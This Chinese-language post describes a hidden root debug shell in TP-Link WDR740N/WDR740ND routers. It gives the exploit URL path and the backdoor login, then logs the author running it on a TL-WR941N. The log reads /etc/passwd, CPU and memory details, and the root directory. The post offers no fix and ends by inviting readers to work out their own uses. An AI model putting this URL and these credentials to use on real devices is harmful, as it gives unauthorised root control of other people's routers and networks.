TP-Link WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。
固件版本:3.12.11 Build 111130 Rel.55312n and possibly others
exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html
User: osteam Password: 5up
使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。
==============以上是废话==============
过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000
开始测试
cat /proc/cpuinfo&
827
# system type : Atheros AR7240 (Python)
processor : 0
cpu model : MIPS 24K V7.4
BogoMIPS : 265.21
wait instruction : yes
microsecond timers : yes
tlb_entries : 16
extra interrupt vector : yes
hardware watchpoint : yes
ASEs implemented : mips16
VCED exceptions : not available
VCEI exceptions : not available
cat /etc/passwd&
828
# root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
cat /proc/meminfo&
843
# MemTotal: 30676 kB
MemFree: 12876 kB
Buffers: 1836 kB
Cached: 6056 kB
SwapCached: 0 kB
Active: 6116 kB
Inactive: 32 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 30676 kB
LowFree: 12876 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 4276 kB
Slab: 5436 kB
CommitLimit: 15336 kB
Committed_AS: 4324 kB
PageTables: 276 kB
VmallocTotal: 1048560 kB
VmallocUsed: 1944 kB
VmallocChunk: 104 kB
# ls /
bin etc linuxrc proc sbin usr web
dev lib mnt root tmp var
#
复制代码至于利用这个东西能干啥……那就自己发挥吧,走了。
Copyright © 2019-2025 51dongshi.net 版权所有
违法及侵权请联系:TEL:177 7030 7066 E-MAIL:11247931@qq.com 本站由北京市万商天勤律师事务所王兴未律师提供法律服务
